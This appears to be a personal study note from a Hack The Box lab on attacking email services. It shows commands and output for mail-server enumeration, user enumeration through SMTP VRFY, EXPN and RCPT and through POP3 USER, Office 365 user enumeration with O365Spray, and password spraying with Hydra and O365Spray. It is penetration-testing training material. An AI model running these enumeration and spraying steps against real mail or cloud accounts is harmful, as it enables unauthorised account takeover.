👨‍💻👾👨‍💻👾👨‍💻👾

Search

SearchSearch

Email Services

Jan 07, 20255 min read

SMTP is used for sending and receiving emails.

POP3 or IMAP4 is used for downloading emails to our email application.

Interaction

telnet ip-addr 110

USER username@domain.com

PASS password123

list

retr 1

Enumeration

We can use Mail eXchanger (MX) DNS record to identify a mail server.

Host

jadu101@htb[/htb]$ host -t MX hackthebox.eu
 
hackthebox.eu mail is handled by 1 aspmx.l.google.com.
jadu101@htb[/htb]$ host -t A mail1.inlanefreight.htb.
 
mail1.inlanefreight.htb has address 10.129.14.128

dig

jadu101@htb[/htb]$ dig mx inlanefreight.com | grep "MX" | grep -v ";"
 
inlanefreight.com.      300     IN      MX      10 mail1.inlanefreight.com.

Identify Users - 25

VRFY

jadu101@htb[/htb]$ telnet 10.10.110.20 25
 
Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
220 parrot ESMTP Postfix (Debian/GNU)
 
 
VRFY root
 
252 2.0.0 root

EXPN

EXPN is similar to VRFY but when it is used with a distribution list, it will list all users on that list.

jadu101@htb[/htb]$ telnet 10.10.110.20 25
 
Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
220 parrot ESMTP Postfix (Debian/GNU)
 
 
EXPN john
 
250 2.1.0 john@inlanefreight.htb
 
 
EXPN support-team
 
250 2.0.0 carol@inlanefreight.htb
250 2.1.5 elisa@inlanefreight.htb

RCPT

jadu101@htb[/htb]$ telnet 10.10.110.20 25
 
Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
220 parrot ESMTP Postfix (Debian/GNU)
 
 
MAIL FROM:test@htb.com
it is
250 2.1.0 test@htb.com... Sender ok
 
 
RCPT TO:julio
 
550 5.1.1 julio... User unknown
 
 
RCPT TO:john
 
250 2.1.5 john... Recipient ok

Identify Users - 110

We can use POP3 protocol to enumerate users as well.

USER

jadu101@htb[/htb]$ telnet 10.10.110.20 110
 
Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
+OK POP3 Server ready
 
USER julio
 
-ERR
 
 
USER john
 
+OK

smtp-user-enum

Good tool but is buggy on my Kali Linux so I would rather use msfconsole use auxiliary/scanner/smtp/smtp_enum.

jadu101@htb[/htb]$ smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7
 
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
 
 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------
 
Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... userlist.txt
Target count ............. 1
Username count ........... 78
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ inlanefreight.htb
 
######## Scan started at Thu Apr 21 06:53:07 2022 #########
10.129.203.7: jose@inlanefreight.htb exists
10.129.203.7: pedro@inlanefreight.htb exists
10.129.203.7: kate@inlanefreight.htb exists
######## Scan completed at Thu Apr 21 06:53:18 2022 #########
3 results.
 
78 queries in 11 seconds (7.1 queries / sec)

Cloud Enumeration

O365Spray can be used for username enumeration and password spraying against Microsoft Office 365.

O365 Spray

Let’s first validate if our target domain is using Office 365:

jadu101@htb[/htb]$ python3 o365spray.py --validate --domain msplaintext.xyz
 
            *** O365 Spray ***            
 
>----------------------------------------<
 
   > version        :  2.0.4
   > domain         :  msplaintext.xyz
   > validate       :  True
   > timeout        :  25 seconds
   > start          :  2022-04-13 09:46:40
 
>----------------------------------------<
 
[2022-04-13 09:46:40,344] INFO : Running O365 validation for: msplaintext.xyz
[2022-04-13 09:46:40,743] INFO : [VALID] The following domain is using O365: msplaintext.xyz

Now we identify usernames:

jadu101@htb[/htb]$ python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz        
                                       
            *** O365 Spray ***             
 
>----------------------------------------<
 
   > version        :  2.0.4
   > domain         :  msplaintext.xyz
   > enum           :  True
   > userfile       :  users.txt
   > enum_module    :  office
   > rate           :  10 threads
   > timeout        :  25 seconds
   > start          :  2022-04-13 09:48:03
 
>----------------------------------------<
 
[2022-04-13 09:48:03,621] INFO : Running O365 validation for: msplaintext.xyz
[2022-04-13 09:48:04,062] INFO : [VALID] The following domain is using O365: msplaintext.xyz
[2022-04-13 09:48:04,064] INFO : Running user enumeration against 67 potential users
[2022-04-13 09:48:08,244] INFO : [VALID] lewen@msplaintext.xyz
[2022-04-13 09:48:10,415] INFO : [VALID] juurena@msplaintext.xyz
[2022-04-13 09:48:10,415] INFO : 
 
[ * ] Valid accounts can be found at: '/opt/o365spray/enum/enum_valid_accounts.2204130948.txt'
[ * ] All enumerated accounts can be found at: '/opt/o365spray/enum/enum_tested_accounts.2204130948.txt'
 
[2022-04-13 09:48:10,416] INFO : Valid Accounts: 2

Password Attacks

We can use Hydra to password spray or brute force against email services like SMTP, POP3, and IMAP4.

Hydra

jadu101@htb[/htb]$ hydra -L users.txt -p 'Company01!' -f 10.10.110.20 pop3
 
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-13 11:37:46
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 67 login tries (l:67/p:1), ~5 tries per task
[DATA] attacking pop3://10.10.110.20:110/
[110][pop3] host: 10.129.42.197   login: john   password: Company01!
1 of 1 target successfully completed, 1 valid password found

O365 Spray

We can use tools such as O365 Spray for Password spraying on Cloud service.

jadu101@htb[/htb]$ python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz
 
            *** O365 Spray ***            
 
>----------------------------------------<
 
   > version        :  2.0.4
   > domain         :  msplaintext.xyz
   > spray          :  True
   > password       :  March2022!
   > userfile       :  usersfound.txt
   > count          :  1 passwords/spray
   > lockout        :  1.0 minutes
   > spray_module   :  oauth2
   > rate           :  10 threads
   > safe           :  10 locked accounts
   > timeout        :  25 seconds
   > start          :  2022-04-14 12:26:31
 
>----------------------------------------<
 
[2022-04-14 12:26:31,757] INFO : Running O365 validation for: msplaintext.xyz
[2022-04-14 12:26:32,201] INFO : [VALID] The following domain is using O365: msplaintext.xyz
[2022-04-14 12:26:32,202] INFO : Running password spray against 2 users.
[2022-04-14 12:26:32,202] INFO : Password spraying the following passwords: ['March2022!']
[2022-04-14 12:26:33,025] INFO : [VALID] lewen@msplaintext.xyz:March2022!
[2022-04-14 12:26:33,048] INFO : 
 
[ * ] Writing valid credentials to: '/opt/o365spray/spray/spray_valid_credentials.2204141226.txt'
[ * ] All sprayed credentials can be found at: '/opt/o365spray/spray/spray_tested_credentials.2204141226.txt'
 
[2022-04-14 12:26:33,048] INFO : Valid Credentials: 1

Graph View

Backlinks

  • No backlinks found